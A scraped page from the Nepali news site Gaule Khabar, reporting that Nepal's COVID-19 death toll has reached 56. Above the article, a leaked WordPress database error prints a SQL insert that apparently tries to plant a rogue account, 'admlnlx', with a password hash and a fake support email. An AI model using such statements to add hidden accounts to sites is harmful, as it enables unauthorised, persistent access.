WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCdGkquysXkoMZzkOQbKi3ldpfZWmI1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 13:47:40', '', 'admlnlx', 'admlnlx')

नेपालमा कोरोनाबाट मृत्यु हुनेको संख्या ५६ पुग्यो – Gaule Khabar

नेपालमा कोरोनाबाट मृत्यु हुनेको संख्या ५६ पुग्यो

नेपालमा कोरोनाबाट मृत्यु हुनेको संख्या ५६ पुग्यो

गाउँले न्युज, काठमाण्डौ । (कोभिड १९) कोरोना संक्रमणबाट अहिलेसम्म नेपालमा ५६ जनाको मृत्यु भएको स्वास्थ्य तथा जनसंख्या मन्त्रालयले पुष्टि गरेको छ ।

पछील्लो मृत्यु हुनेमा पर्सा जिल्ला वीरगन्ज महानगरपालिका ११ श्रीपुर निवासी ५६ वर्षीय
एक पुरुष र ६५ वर्षीया एक महिला त्यस्तै पर्सा जिल्ला वीरगन्ज महानगरपालिका २ र १६ को ६५ बर्षिय पुरुष र ३५ वर्षीय एक महिलाको मृत्‍यु भएको हो ।

शुक्रबार स्वास्थ्य तथा जनसंख्या मन्त्रालयले गरेको नियमित कोभिड–१९ प्रेस ब्रिफिङमा मन्त्रालयका प्रवक्ता जागेश्वर गौतमले हालसम्म नेपालमा कोरोनाबाट मृत्यु हुनेको संख्या ५६ पुगेको बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका